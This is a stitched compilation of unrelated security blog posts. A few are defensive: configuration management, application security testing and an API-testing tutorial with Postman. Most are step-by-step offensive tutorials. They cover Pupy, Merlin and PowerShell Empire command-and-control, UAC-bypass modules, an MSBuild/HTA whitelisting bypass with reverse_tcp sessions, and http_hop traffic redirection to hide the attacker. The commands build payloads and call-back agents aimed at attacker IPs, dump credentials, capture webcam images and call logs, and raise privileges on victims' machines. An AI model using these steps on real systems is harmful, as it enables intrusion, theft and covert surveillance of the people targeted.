The configuration of web and application servers is a very important aspect of web applications. Oftentimes, failure to manage proper configurations can lead to a wide variety of security vulnerabilities within servers and environments. When these configurations are not properly addressed, the overall security posture suffers. Sometimes the biggest problem organizations face is that these flaws are not being identified or addressed at all. Instead, in many cases, configurations are left unchanged because of the ideology of “if it is not broke, don’t fix it.” This is a big misconception: just because a problem has not arisen yet does not mean the system is not vulnerable.

Security misconfiguration is a serious flaw that appears on OWASP’s list of the ten most critical web application security risks, a list compiled by a broad consensus of security experts. Currently, this vulnerability sits at number six on the list.

So what can be done about these insecure configurations? Many configuration vulnerabilities can be detected by simply understanding the environment through network diagrams, spreadsheets and IP databases, as well as regular security scanning. Identification is where it all begins: an organization should first know what applications are in its environment so it can properly protect them. This can be accomplished with active and passive discovery scans to locate everything and produce an inventory. During the discovery phase, all information should also be classified, sensitive data defined and all labels completed. Sensitive data is anything that is not public or unclassified: personally identifiable information (PII), protected health information (PHI) or proprietary data. One great tool for asset discovery scanning is Nmap, a free and open-source scanner used to discover hosts and services by sending packets and analyzing the responses.
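As a minimal sketch with Nmap (address ranges are illustrative), a discovery pass might look like:

# ping sweep to inventory live hosts
nmap -sn 10.0.0.0/24 -oA discovery_sweep
# service and OS detection against a discovered host
nmap -sV -O 10.0.0.5 -oA host_profile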

After you know what is on your network, the next step should be to begin scanning internally and externally for known configuration vulnerabilities. This process typically uses software tools to scan entire networks (or designated ranges) for known security vulnerabilities, as well as to provide information about each vulnerability, possible solutions and an idea of the risk it poses to the security posture of the network. Automated tools that can do this include OpenVAS, Nessus, Nexpose and Qualys, to name a few. Scanning is a pretty simple process, but there are still a few things to keep in mind. Some systems, such as printers, industrial control systems (ICS) and phone systems, can be fragile, so take care when including them. Schedule daily jobs to keep on top of everything. Lastly, use a central point to pull data back to, and flag key events such as new systems and applications.

Once asset discovery and vulnerability scanning are complete, a configuration guideline should be created. This guideline should start with the vendor-recommended configuration as a baseline, then be modified based on the recommendations of security organizations as well as vulnerability testing results. Once complete, these guidelines should be followed and maintained.

The overall process of identifying and addressing security misconfigurations is a process that should be reviewed and compared to previous testing regularly to assess the progress and overall security posture of the organization. This regular maintenance should include monitoring for the latest security vulnerabilities released, applying the most up to date security patches available, updating the security guidelines, completing regular asset and vulnerability scanning, and regular documentation. Always remember to follow up on any potential threats or flaws in the system. It is OK to disregard some items as false positives, or even to accept them as an acceptable risk, but keep this documented at all times.

Don’t let simple configuration flaws be the difference between a solid security posture and one that is vulnerable to simple attacks. It does not take much to maintain recommended configurations within your system and ensure that everything is up to date and working properly. Once an initial process has been established to create the guidelines, configuration management systems are available to help standardize configurations and avoid constant manual effort. Once implemented, such systems can even be semi- or fully automated for the configuration process. But even if automated, the process should still be regularly reviewed and maintained.

In the end, it is worth it to simply set up your organization’s web and application configurations to stay protected against vulnerabilities and attacks.

Command & Control Tool: Pupy

In this article, we will learn to exploit Windows, Linux and Android with pupy command and control tool.

Table of Content :

  • Introduction
  • Installation
  • Windows Exploitation
  • Windows Post Exploitation
  • Linux Exploitation
  • Linux Post Exploitation
  • Android Exploitation
  • Android Post Exploitation

Introduction

Pupy is a cross-platform post-exploitation tool as well as a multi-function RAT. It’s written in Python, which makes it very convenient, and it has low detectability, which makes it a great tool for the red team. Pupy can communicate using multiple transports, migrate into processes using reflective injection, and load remote Python code, Python packages and Python C-extensions from memory.

It uses a reflective DLL to load the Python interpreter from memory, which is great as nothing is written to disk. It doesn’t have any special dependencies and can migrate into other processes. Pupy’s communication protocols are modular and stackable, and it can execute non-interactive commands on multiple hosts at once. All the interactive shells can be accessed remotely.

Installation

To install pupy execute the following commands one by one :

git clone https://github.com/n1nj4sec/pupy
cd pupy
./install.sh

Now install all the requirements using pip with the following command:

pip install -r requirements.txt

Now run pupy using the following command :

./pupysh.py

This command will open the prompt where you will get your session.

Now, to create our payload, we will use pupygen. Use the following help command to see all the attributes we can use:

./pupygen.py -h

Windows Exploitation

Now we will create a Windows payload in order to exploit Windows with the following command:

./pupygen.py -O windows -A x86 -o /root/Desktop/shell.exe

Here,

-O : refers to the operating system

-A : refers to the architecture

-o : refers to the output file path

When you are successful in executing the shell.exe on the victim’s PC, you will have your session as shown in the image:

Windows Post Exploitation

Further, there are a number of post-exploitation modules you can use, and they are pretty simple. We show some of them in this article. To pop up a message dialogue box on the target machine, you can use the following command:

msgbox --title hack "you have been hacked"

As per the command, the following dialogue box will open on the target machine:

You can also access the desktop using the remote desktop module with the following command:

rdesktop -r 0

After executing the above command, you can remotely access the desktop, just as shown in the image below:

To bypass UAC, we have a very simple command in pupy:

bypassuac -r

The above command will recreate a session with admin privileges, as shown in the image below:

Then, to get the system’s credentials, you can use the following command:

creddump

And as you can see in the image below, you get information about all the credentials:

Using pupy, we can also migrate our session to a particular process. The attributes of the migrate command are shown in the image below:

With the ps command, you can find the process ID of every process running on the target PC, along with which process each one is. Knowing the process ID is important, as it is required by the migrate command and helps us migrate our session where we desire.

Now that we know which processes are running, we can migrate our session. For this, type the following command:

migrate -p explorer.exe -k

And then a new session will be created as desired.

Linux Exploitation

To exploit Linux, we will have to generate a Linux payload with the following command:

./pupygen.py -O linux -A x64 -o /root/Desktop/shell

Once you execute the malicious file on the target system, you will have your session as shown in the image below:

Now that you have a session, you can check whether the target machine is running in a VM or is a host machine with the following command:

check_vm

And as you can see in the image below, the target machine is, in fact, running in a VM.

Linux Post Exploitation

In post-exploitation, you can get detailed privilege-escalation information about the target system with the following command:

privesc_checker --linenum

With pupy, you can also find out which exploits may work against the target system with the help of the following command:

exploit_suggester --shell /bin/bash

As you can see in the image below, it gives us a list of all the exploits to which the target system is vulnerable.

To get basic information about the target system, such as its IP address and MAC address, you can use the following command:

get_info

Android Exploitation

Now we will create an Android payload in order to exploit the device with the following command:

./pupygen.py -O android -o /root/shell.apk

When you are successful in installing the shell.apk on the victim’s Android phone, you will have your session as shown in the image:

Android Post Exploitation

In post-exploitation, you can grab the call logs stored on the target device with the following command:

call -a -output-folder /root/call

Here,

-a : refers to getting all the call details

-output-folder : refers to the path of the output file containing the call logs

We will use the cat command on callDetails.txt to read the call logs.

To get a camera snap from the primary camera on the target device, you can use the following command:

webcamsnap -v

Here,

-v : refers to view the image directly

As we can see in the given image, we have the snap captured and stored at the given location.

To get information about the installed packages or apps on the target device, you can use the following command:

apps -a -d

Here,

-a : refers to getting all the installed packages details

-d : refers to view detailed information

As we can see in the given image, we have detailed information about the packages or apps installed on the target machine.

Author: Sayantan Bera is a technical writer at Hacking Articles and a cybersecurity enthusiast. Contact Here

The post Command & Control Tool: Pupy appeared first on Hacking Articles.

Multiple Ways to Exploiting OSX using PowerShell Empire

In this article, we will learn multiple ways to hack OS X using Empire. Empire offers various stagers for this purpose, and we use a few of them in this article. The method for attacking OS X is similar to that for Windows. For the beginner’s guide to pen-testing OS X, click here.

Table of Content :

  • osx/macho
  • osx/applescript
  • osx/launcher
  • osx/jar
  • osx/safari_launcher

osx/macho

The first stager we will use is osx/macho. This stager creates a Mach-O file, the executable binary format for OS X. The format, made specifically for OS X, informs the system of the order in which code and data are read into memory. So, this stager is quite useful when it comes to attacking OS X.

The listener creation is the same as for Windows; use the http listener. Once the listener is created, execute the following set of commands:

usestager osx/macho
set Listener http
set OutFile shell.macho
execute

As soon as shell.macho is executed on the victim’s PC, you will have your session as shown in the image below:

osx/applescript

The next stager we will use is osx/applescript. This stager creates AppleScript code; AppleScript provides automated control over scriptable Mac applications, making it a natural fit for pen-testing a Mac. To create the malicious AppleScript, run the following set of commands:

usestager osx/applescript
set Listener http
execute

Executing the above stager will create a code; run this code on the targeted system as shown in the following image:

As soon as the code is executed on the victim’s PC, you will have your session as shown in the image:

osx/launcher

The next stager we will use is osx/launcher. This stager is the most commonly used. To execute it, run the following commands:

usestager osx/launcher
execute

Copy this code and run it in the target system’s shell. As soon as the code is executed, you will have your session as shown in the image below:

osx/jar

The next stager we will use is osx/jar. This stager creates a jar file, which is a Java archive. This format is used for compressed Java files, which run as intended when the archive is executed. Since the format is made specifically for Java files, this stager turns out to be a suitable one when it comes to attacking OS X. Use the following set of commands to execute it:

usestager osx/jar
set Listener http
set OutFile out.jar
execute

The stager will create a jar file, as described above; when the file is executed on the victim’s system, you will have your session as shown in the image:

osx/safari_launcher

The last stager we will use is osx/safari_launcher, which generates an HTML script for Safari. For this stager, run the following set of commands:

usestager osx/safari_launcher
set Listener http
execute

Run the generated code in Safari on the victim’s PC, and you will have your session as shown in the image below:

So, these were five ways to attack or pen-test OS X. They are pretty easy and convenient, and each of them is valid and up to date.

Author: Sanjeet Kumar is an Information Security Analyst | Pentester | Researcher  Contact Here

The post Multiple Ways to Exploiting OSX using PowerShell Empire appeared first on Hacking Articles.

Application Security Has Nothing to Do With Luck

This St. Patrick’s Day is sure to bring all the usual trappings: shamrocks, the color green, leprechauns and pots of gold. But while we take a step back to celebrate Irish culture and the first signs of spring this year, the development cycle never stops. Think of a safe, secure product and a confident, satisfied customer base as the pot of gold at the end of your release rainbow. To get there, you’ll need to add application security to your delivery pipeline, but it’s got nothing to do with luck. Your success depends on your organizational culture.

It’s Time to Greenlight Application Security

Because security issues in applications have left so many feeling a little green, consumers now expect and demand security as a top priority. However, security efforts are often seen as red, as in a red stop light or stop sign; in other cases, they are seen as a cautious yellow at best. But what if security actually enabled you to go faster?

By adding application security early in the development cycle, developers can obtain critical feedback to resolve vulnerabilities in context when they first occur. This earlier resolution can actually reduce overall cycle times. In fact, a 2016 Puppet Labs survey found that “high performers spend 50 percent less time remediating security issues than low performers,” which the most recent edition attributed to the developers building “security into the software delivery cycle as opposed to retrofitting security at the end.” The 2018 study also noted that high-performing organizations were 24 times more likely to automate security configurations.

Go green this spring by making application security testing a part of your overall quality and risk management program, and soon you’ll be delivering faster, more stable and more secure applications to happier customers.

Build Your AppSec Shamrock

Many people I talk to today are working hard to find the perfect, balanced four-leaf clover of application modernization, digital transformation, cloud computing and big data to strike gold in the marketplace. New methodologies such as microservice architectures and new container-based delivery models create an ever-changing threat landscape, and it’s no wonder that security teams feel overwhelmed.

A recent Ponemon Institute study found that 88 percent of cybersecurity teams spend at least 25 hours per week investigating and detecting application vulnerabilities, and 83 percent spend at least that much time on remediation efforts. While it’s certainly necessary to have these teams in place to continuously investigate and remediate incidents, they should ideally focus on vulnerabilities that cannot be found by other means.

A strong presence in the software delivery life cycle will allow other teams to handle more of the common and easier-to-fix issues. For a start this St. Patrick’s Day, consider establishing an application security “shamrock” that includes:

  • Static application security testing (SAST) for developer source code changes;
  • Dynamic application security testing (DAST) for key integration stages and milestones; and
  • Open-source software (OSS) analysis to identify vulnerabilities in third-party software.

You can enhance each of these elements by leveraging automation, intelligence and machine learning capabilities. Over time, you can implement additional testing capabilities, such as interactive application security testing (IAST), penetration testing and runtime application self-protection (RASP), for more advanced insight, detection and remediation.

Get Off to a Clean Start This Spring

In the Northern Hemisphere, St. Patrick’s Day comes near the start of spring, and what better time to think about new beginnings for your security program? Start by incorporating application security into your delivery pipeline early and often to more quickly identify and remediate vulnerabilities. Before long, you’ll find that your security team has much more time to deal with critical flaws and incidents. With developers and security personnel working in tandem, the organization will be in a much better position to release high-quality applications that lead to greater consumer trust, lower risk and fewer breaches.

The post Application Security Has Nothing to Do With Luck appeared first on Security Intelligence.

Better API Penetration Testing with Postman – Part 1

This is the first of a multi-part series on testing with Postman. I originally planned for it to be one post, but it ended up being so much content that it would likely be overwhelming if not divided into multiple parts. So here’s the plan: In this post, I’ll give you an introduction to setting up Postman and using it to issue your regular request. In Part 2, I’ll have you proxying Postman through Burp Suite. In Part 3, we’ll deal with more advanced usage of Postman, including handling Bearer tokens and Environment variables more gracefully. In Part 4, I’ll pull in one or two Burp plugins that can really augment Postman’s behavior for pen-testing.

In this day and age, web and mobile applications are often backed by RESTful web services. Public and private APIs are rampant across the internet and testing them is no trivial task. There are tools that can help. While (as always with pen-testing) tools are no substitute for skill, even the most skilled carpenter will be able to drive nails more efficiently with a hammer than with a shoe.

One such tool is Postman, which has been popular with developers for years. Before we get into how to set it up, here’s a quick overview of what Postman is and does. Postman is a commercial desktop application, available for Windows, Mac OS, and Linux. It is available for free, with paid tiers providing collaboration and documentation features. These features are more relevant to developers than penetration testers. It manages collections of HTTP requests for testing various API calls, along with environments containing variables. This does not replace your proxy (Burp, ZAP, Mitmproxy, etc), but actually stands in as the missing browser and client application layer. Main alternatives are open-source tools Insomnia and Advanced REST Client, commercial option SoapUI, or custom tooling built around Swagger/Swagger UI or curl.

Setting Up Postman

Postman is available from its official website at https://www.getpostman.com, as an installer for Windows and MacOS, and a tarball for Linux. It can also be found in a Snap for Ubuntu (https://snapcraft.io/postman), and other community-maintained repos such as the AUR for Arch Linux. The first step to setting it up is, of course, to install it.

Upon first launching Postman, you’ll be greeted with a screen prompting you to Create an Account, Sign up with Google, or sign in with existing credentials. However, Postman doesn’t require an account to use the tool. 

The account is used for collaborating/syncing/etc., the paid-tier features. As I mentioned earlier, they’re great for developers, but you probably don’t care for them. In fact, if you generally keep your clients confidential, like we do at Secure Ideas, you probably explicitly don’t want to sync your project to a third-party server.

If you look down near the bottom of the window, there’s some light gray text that reads Skip signing in and take me straight to the app. Click that, and you will move to the next screen – a dialog prompting you to create stuff.

There are several parts you’re not going to use here, so let’s look at the three items that you actually care about:

  • Collection – a generic container you can fill with requests. It can also act as a top-level object for some configuration choices, like Authentication rules, which we’ll expand on later.
  • Request – the main purpose for being here. These are the HTTP requests you will be building out, with whatever methods, bodies, etc. you want to use. These must always be in a Collection.
  • Environment – holds variables that you want to control in one place and use across requests or even across collections.

The Basics of Working with Postman

It’s time to create our first Postman Collection and start making requests.

The New button in the top left is what you will typically use for creating Collections and Requests. Start by creating a Collection. This is sort of like an individual application scope; you will use it to group related requests.

A collection can also act as a top-level item with Authentication instructions that will be inheritable for individual requests.

For now, just name it something, and click the Create button. I called mine Test Collection.

By default, you will have an unnamed request tab open already. Let’s take a tour of that portion of the UI.

  1. The active tab
  2. The name of this request. This is just some descriptive name you can provide for it.
  3. The HTTP Method. This drop-down control lets you change the method for this request.
  4. The URL for the request. This is the full path, just as if it was in your browser.
  5. The tabbed interface for setting various attributes of the request, including Parameters, Headers, Body, etc.
  6. The send button. This actually submits the request to the specified URL, as it is currently represented in the editor.
  7. The save button. The first time you click this, you will need to specify your collection, as the request must belong to a collection.

I have a sample target set up at http://localhost:4000, so I’m going to start by filling in this request and saving it to my collection. It’s going to be a POST, to http://localhost:4000/legacy/auth, without any parameters (what can I say? It’s a test API. It’ll let anyone authenticate). When I click the Save button, I will name the request and select the Collection for it, as below.

Then I’ll click Save to Test Collection (adjust for your collection name) to save my request. Now, clicking the Send button will issue the request. Then I will see the Response populated in the lower pane of the window, as below.

  1. The tab interface has the Body, Cookies, Headers, and Test Results. We haven’t written any tests yet, but notice the badges indicating the response returned 1 cookie and 6 headers.
  2. The actual response body is in the larger text pane.
  3. We have options for pretty-printing or Raw response body, and a drop-down list for different types (I believe this is pre-populated by the content-type response header). There’s also a soft-wrap button there in case you have particularly wide responses.
  4. Metrics about the response, including HTTP Status Code, Time to respond, and Size of response.
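
For comparison, the same request and response details can be reproduced outside Postman; a minimal curl sketch, assuming the same local test API as above (the -i flag prints the status line and headers that Postman surfaces in its tabs):

curl -i -X POST http://localhost:4000/legacy/auth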

A Side-Note about Cookies

Now, if we reissue our request with Postman, we’ll notice an important behavior: the cookie that the previous response set will be included automatically. This mimics what a browser normally does for you. Just as you would expect from the browser, any requests Postman issues within that cookie’s scope will automatically include that cookie.
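
Outside of Postman, the same behavior can be mimicked with curl’s cookie jar; a minimal sketch against the same test API (the jar file name is arbitrary):

# save any Set-Cookie values from the first response, as Postman does automatically
curl -c cookies.txt -X POST http://localhost:4000/legacy/auth
# reissue the request with the stored cookies attached
curl -b cookies.txt -X POST http://localhost:4000/legacy/auth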

What if you want to get rid of a cookie?
That’s easy. Just below the Send button in Postman, there’s a Link-like button that says Cookies. Click that, and it will open a dialog where you can delete or edit any cookies you need to.

And that’s it in a nutshell for cookie-based APIs. But let’s face it: today it’s more common for APIs to use Bearer tokens than cookies. We’ll address that in an upcoming part, along with some other, more advanced concepts.

What’s Next

In Part 2, we’ll proxy Postman through Burp Suite, and talk about the advantages of that approach.
In Part 3, we’ll dig into some more advanced usage of Postman.
In Part 4, we’ll use some Burp Suite extensions to augment Postman.

The Power of Vulnerability Management: Are You Maximizing Its Value?

Tripwire has been in the business of providing vulnerability management solutions with IP360 for about 20 years. With over 20,000 vulnerabilities discovered last year alone, vulnerability management continues to be an important part of most security plans. And most organizations agree. In a recent survey, 89 percent of respondents said that their organizations run vulnerability […]… Read More

The post The Power of Vulnerability Management: Are You Maximizing Its Value? appeared first on The State of Security.

Command and Control Guide to Merlin

In this article, we learn how to use the Merlin C2 tool, which was developed by Russel Van Tuyl in the Go language.

Table of Contents:

  • Introduction
  • Installation
  • Windows exploitation
  • Windows post exploitation
  • Linux exploitation
  • Linux post exploitation

Introduction

Merlin is a great cross-platform command and control tool written in the Go language. It is made up of two elements, the server and the agent, which communicate over the HTTP/2 protocol. The best things about Merlin are that it can be compiled for any platform and that you can even build it from source. Normally, agents are placed on Windows machines and the listener runs on Linux, but because it is written in Go, Merlin lets us put agents on any platform or machine we come across and listen from any platform as well. This makes it more successful than other frameworks when it comes to red teaming, as its HTTP/2 traffic makes IDS/IPS struggle to identify it.

The Merlin server should be run from a folder that agents can call back to. By default, the server is configured on 127.0.0.1:443, but you can change it to your own IP. The Merlin agent, as discussed earlier, can be cross-compiled to run on any platform. Agents are controlled through the Merlin server, and any binary file is executed using the target’s PATH variable.

Installation

Merlin’s installation is pretty tricky; the most convenient way to set it up is shown in this article. Installing the Go language is compulsory for Merlin to work. So, to install the Go language, type:

apt install golang

And then, to download Merlin, run the following commands:

mkdir /opt/merlin;cd /opt/merlin
wget https://github.com/Ne0nd0g/merlin/releases/download/v0.1.4/merlinServer-Linux-x64-v0.1.4.7z

Once the above commands have executed successfully, use the following command to unzip the Merlin server.

7z x merlinServer-Linux-x64-v0.1.4.7z

Now, after unzipping, when you run the ls command you will find the Merlin server and a readme file. We can check whether the server runs by using the following command:

./merlinServer-Linux-x64

In “README.MD”, we find the instructions for installing “Merlin” on our system.

Now, according to the readme file, we have to set up the GOPATH environment variable for the installation and then install Merlin using go get instead of git clone. So, to complete these steps, run the following set of commands:

echo "export GOPATH=$HOME/go" >> .bashrc
source .bashrc
go get github.com/Ne0nd0g/merlin
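
If go get fails quietly, it is worth confirming the toolchain first; a quick sanity check (the output values are illustrative):

go version    # confirm the Go toolchain installed correctly
echo $GOPATH  # should print something like /root/go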

Once the download completes, let’s check the contents of the new directory using the cd and ls commands.

There is a cmd directory, and inside it a directory named merlinserver, where we find main.go. Run main.go as shown in the image below:

go run main.go

As you can see, Merlin is still not running properly because it has not been given an SSL certificate. If you navigate through the /opt/merlin directory, you will find a directory named data in which there is an SSL certificate. Copy the data folder into the merlinserver directory as shown in the image below:

Now if you run merlin using the command: go run main.go, merlin server will run successfully.

Now, using the following help command, you can see (as shown in the image) the arguments that you can use to run your commands as desired:

go run main.go -h

Windows exploitation

Now, to build a Merlin agent for Windows, type the following command:

GOOS=windows GOARCH=amd64 go build -ldflags "-X main.url=https://192.168.0.11:443" -o shell.exe main.go

Now, share the shell with the target using the python server:

python -m SimpleHTTPServer 80
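
Note that SimpleHTTPServer is a Python 2 module; on a machine that only has Python 3, the equivalent one-liner is:

python3 -m http.server 80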

In order to create a listener for the shell to revert, use the following command:

go run main.go -i 192.168.0.11

And just like that, you will have your session as shown in the image above. Now, use the help command to see all the options as shown in the image given below:

Type sessions to see the list of the sessions you acquire as shown in the image below:

To access an available session, use the following command:

interact <session name>

Once you have accessed the session, you can use Windows commands such as:

shell ipconfig

You can then use various post-exploitation modules, a list of which is shown in the image below:

Windows post exploitation

We will be using a module here to dump the Windows credentials; to activate the said post-exploitation module, type:

use module windows/x64/powershell/credentials/dumpCredStore

As you can see in the image above, the info command gives us all the details about the module, including the options that we need to specify. So, let’s set those options:

set agent <agent name>
run

Linux exploitation

Now, we will build a Merlin agent for a Linux machine. For this, simply type the following command:

export GOOS=linux; export GOARCH=amd64; go build -ldflags "-s -w -X main.url=https://192.168.0.11:443" -o shell.elf main.go
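
Before shipping the agent, a quick check with the file utility (assuming it is installed) confirms the build really targets 64-bit Linux:

file shell.elf   # expect something like: ELF 64-bit LSB executable, x86-64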

Once the agent is built, use Python to share the file with the victim as shown in the image below, or however you see fit. To start the Python HTTP server:

python -m SimpleHTTPServer 80

Set up the listener and wait for the file to be executed.

go run main.go -i 192.168.0.11

And as shown in the image above, you will have your session. Then type sessions to see the list of sessions gained.

Then to access the session use the following command:

interact <session name>

Then further you can use any Linux command such as:

shell ls

Linux post exploitation

Even on Linux, you can further use a number of post-exploitation modules. The one we will be using in this article is privesc/LinEnum:

use module linux/x64/bash/privesc/LinEnum

Through the info command, we know that we have to supply a session in order to run this module. So, type:

set agent <session name>
run

And this way your module will run. Do try working with the Merlin C2 tool; it is one of the best, and as you have seen, its cross-platform nature makes it remarkably convenient.

Author: Sayantan Bera is a technical writer at Hacking Articles and a cybersecurity enthusiast. Contact Here

The post Command and Control Guide to Merlin appeared first on Hacking Articles.

Bypass User Access Control using Empire

This is the fifth article in our Empire series; for the basic guide to Empire, click here. In this article, we will learn to bypass User Account Control and gain administrator privileges using various bypassuac post-exploitation modules.

Table of Contents:

  • Introduction
  • Bypassuac_env
  • Bypassuac_eventvwr
  • Bypassuac_fodhelper
  • Bypassuac_wscript
  • Bypassuac

Introduction

UAC stands for User Account Control, the mechanism that determines how many rights a user has to make changes in the system. The rights given to a user depend on integrity levels, which are:

  • High: Administrator rights
  • Medium: Standard user rights
  • Low: Extremely restricted

UAC works by adjusting the permission level of our user account, and on the basis of this permission it decides whether or not to run a program. When changes are made at this permission level, it notifies us; the modules below help us bypass that control. The highest integrity, which we are trying to gain, is indicated by the number 1.
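
For reference, you can also check the integrity level of the current process directly on the Windows side; a quick one-liner from a shell on the target (the label text assumes an English-language system):

whoami /groups | findstr /i "mandatory"

A medium-integrity shell reports Mandatory Label\Medium Mandatory Level, while a successful bypass yields High Mandatory Level.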

Bypassuac_env

Let’s start with the first module, i.e. bypassuac_env. Now, as you can see in the image, we already have an Empire session with an integrity of 0, which means we do not have admin rights. So, type the following set of commands to get administrator privileges:

usemodule privesc/bypassuac_env
set Listener http 
execute

Executing the above module will give you a new session. Upon accessing the said session, you can see the integrity has changed to 1, which means we now have administrator rights, just as shown in the image below:

Bypassuac_eventvwr

Now, let’s try another module, privesc/bypassuac_eventvwr. The function of this module is the same as before, i.e. to get administrator rights so we can attack more effectively. This module makes a change to a registry key and inserts a custom command which is then executed when the Windows Event Viewer is launched; this custom command will turn the UAC flag off. And, as you can see, we have a session with an integrity of 0, which indicates we have no admin rights yet. So, run the following commands:

usemodule privesc/bypassuac_eventvwr
set Listener http 
execute

As you can see, we have a new session with the integrity of 1 which confirms that we now have admin rights.

Bypassuac_fodhelper

The next module we will use for the same purpose is privesc/bypassuac_fodhelper. This module gains administrator rights by hijacking a special key in the registry and inserting a custom command that is invoked when the Windows fodhelper.exe application is executed. It covers its tracks by getting rid of the key after the payload is invoked. Now, just like before, use the following set of commands:

usemodule privesc/bypassuac_fodhelper 
set Listener http 
execute

Once the module is executed, you will have a session with an integrity of 1; hence we have succeeded in attaining admin rights.

Bypassuac_wscript

The next bypassuac module we will use is privesc/bypassuac_wscript. When using wscript for a UAC bypass, there is no need for you to send a DLL to the target. As wscript.exe does not have an embedded manifest, it is easy to abuse. Similarly, to gain administrator privileges, use the following commands:

usemodule privesc/bypassuac_wscript 
set Listener http 
execute

As you can see in the image, the new session that we have gained has admin rights.

Bypassuac

The last module we will use for the same purpose is privesc/bypassuac; the process is just as simple. Execute the following commands:

usemodule privesc/bypassuac 
set Listener http 
execute

As you can see in the image above, the new session gained has an integrity of 1; hence administrator rights have been obtained.

Author: Yashika Dhir is a passionate researcher and technical writer at Hacking Articles. She is a hacking enthusiast. Contact here

The post Bypass User Access Control using Empire appeared first on Hacking Articles.

nps_payload: An Application Whitelisting Bypass Tool

In this article, we will create payloads using a tool named nps_payload and get meterpreter sessions using those payloads. This tool is written by Larry Spohn and Ben Mauch. Find this tool on GitHub.

Attacker: Kali Linux

Target: Windows 10

Table of Contents:

  • Downloading and Installing
  • Getting session using MSBuild
  • Getting session using MSBuild HTA

Downloading and Installing

First, we will get the tool in our attacker machine. It is Kali Linux in our case. The tool is available at GitHub. We will use the git clone command to download it on our machine.

git clone https://github.com/trustedsec/nps_payload.git

Now we will traverse inside the folder that was downloaded using git clone; we can check that the download succeeded using the ls command. After that, use cd to get inside the nps_payload folder. The tool’s dependencies are listed in a requirements text file. We could install each of those requirements individually, but that would be time-consuming; instead, we will use the pip install command and point it at the requirements file, and pip will automatically pick up the requirements and install them.

pip install -r requirements.txt

Getting session using MSBuild

Now that we have successfully downloaded the tool and installed the requirements, it’s time to launch the tool, create some payloads and get some sessions. To launch the tool, we can either use the command

python nps_payload.py

or simply run

./nps_payload.py

After launching the tool, we are given options to choose the technique we need to use: the default MSBuild payload or the HTA format. We are going to use both, but first we will choose the default MSBuild payload. Next, we have to choose the type of payload: reverse_tcp, reverse_http, reverse_https or a custom one. We can choose any one, but here we are choosing reverse_tcp.

Following this, we are asked to enter the local IP address. This is the IP address of the machine where we want the session to arrive, i.e. the attacker machine; in our case, it is Kali Linux. After that, we are asked to enter the listener port, which is set to 443 by default; we are not changing it. That’s it: we are told that the payload has been successfully created as an msbuild_nps.xml file, and that we should start a listener.

We will start the listener before anything else. To do this, we have to be inside the nps_payload folder. A Metasploit resource script that creates the listener for us is provided alongside the payload, so we run it as shown below.

msfconsole -r msbuild_nps.rc

Let’s check the file that we created earlier using the ls command. Now to send the file to the target we will host the directory using the HTTP server as shown below:

python -m SimpleHTTPServer 80

Now onto the target machine. We browse to the IP address of the attacker machine and see that we have the file msbuild_nps.xml. To have MSBuild execute this XML file, we have to move the payload file into this path:

C:\Windows\Microsoft.NET\Framework\v4.0.30319

Once we have the msbuild_nps.xml file inside the depicted path, we need a command prompt (cmd) at that particular path. Once we have a cmd there, we execute the payload with MSBuild as shown below.

MSBuild.exe msbuild_nps.xml
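
If moving the XML file into the framework directory is inconvenient, MSBuild can also be invoked by its full path from wherever the payload sits; a hedged sketch (the Downloads path below is an assumption):

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Users\victim\Downloads\msbuild_nps.xml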

Now back on our attacker machine, where we created a listener earlier, we see that we have a meterpreter session. This concludes the attack.

NOTE: If a session is not opened, please be patient. It sometimes takes a bit of time to generate a stable session.

Getting session using MSBuild HTA

Let’s get another session using the HTA file. To do this we will generate an HTA file. First, we will launch the tool using the command below.

./nps_payload.py

After launching the tool, we are going to choose the HTA payload. Next, we have to choose the type of payload: reverse_tcp, reverse_http, reverse_https or a custom one. We can choose any one, but here we are choosing reverse_tcp.

Following this, we are asked to enter the local IP address of the attacker machine (Kali Linux in our case). After that, we are asked to enter the listener port, which is again set to 443 by default; we are not changing it. That’s it: we are told that the payload has been successfully created as an msbuild_nps.hta file, and that we should start a listener.

We will start the listener as we did earlier.

msfconsole -r msbuild_nps.rc

Let’s check the file that we created earlier using the ls command. Now to send the file to the target we will host the directory using the HTTP server as shown below:

python -m SimpleHTTPServer 80

Now onto the target machine. We browse to the IP address of the attacker machine and see that we have the file msbuild_nps.hta. Right-click on it and choose Save Link As; this will download the payload.

Once we have the msbuild_nps.hta file, we need a command prompt (cmd) at the path where we saved the payload file; in our case, that is the Downloads folder of the current user. Once we have a cmd there, we execute the payload as shown below.

mshta.exe msbuild_nps.hta

Now back on our attacker machine, where we created a listener earlier, we see that we have a meterpreter session. This concludes the attack.

NOTE: If a session is not opened, please be patient. It sometimes takes a bit of time to generate a stable session.

Author: Shubham Sharma is a Cybersecurity enthusiast and Researcher in the field of WebApp Penetration testing. Contact here

The post nps_payload: An Application Whitelisting Bypass Tool appeared first on Hacking Articles.

Hiding IP During Pentest using PowerShell Empire (http_hop)

This is our fourth article in the Empire series. In this article, we learn to use the hop payload in PowerShell Empire. Empire has an inbuilt listener named http_hop which allows us to redirect our traffic through another of our active listeners after getting an agent; thus the name hop, as it hops the agent from one listener to another in order to redirect traffic.

Similar to Metasploit, the hop listener in Empire uses a hop.php file. When you activate the hop listener, it will generate three PHP files that redirect to your existing listener. Place the said files on your jump server (Ubuntu) and then set up your stager accordingly to get the session through the intermediary, i.e. our hop listener.

In the following image, you can see our Kali machine’s IP. Now, we will try to take a Windows session via Ubuntu using the http_hop payload in order to hide our own IP; essentially, the http_hop payload will help us (the attacker) avoid getting caught.

Here, in the following image, you can see our ubuntu’s IP too.

Now, let’s get started. First, we need a simple http listener; to create one, type:

uselistener http
execute

Now, start the http_hop listener by typing :

uselistener http_hop
set RedirectListener http
set Host http://192.168.1.111
execute

Here, we have set RedirectListener to http, i.e. all the traffic reaching the http_hop listener will be redirected to the http listener.

Executing the above listener will create three files, as you can see in the image above. Transfer these files to the /var/www/html directory of your Ubuntu machine as shown in the image below:
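
If you prefer the command line, one way to stage the files from Kali onto the Ubuntu jump box is shown below (the user, host placeholder and file glob are assumptions; use whatever file names Empire reported when the listener was created):

# copy the generated PHP files to the jump box, then move them into the web root
scp *.php user@<ubuntu-ip>:/tmp/
ssh user@<ubuntu-ip> "sudo mv /tmp/*.php /var/www/html/ && sudo systemctl restart apache2"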

Now, you can see in the image below we have activated two listeners :

Let’s start our stager by typing the following commands :

usestager windows/launcher_bat
set Listener http_hop
execute

Once our bat file is executed on the target PC, we will have our session. Now, if you observe, the IP through which we have obtained the session is Ubuntu’s, even though we actually have access to a Windows PC; similarly, on the Windows side it will appear that the attacking machine is Ubuntu and not Kali. Hence our http_hop is effective.

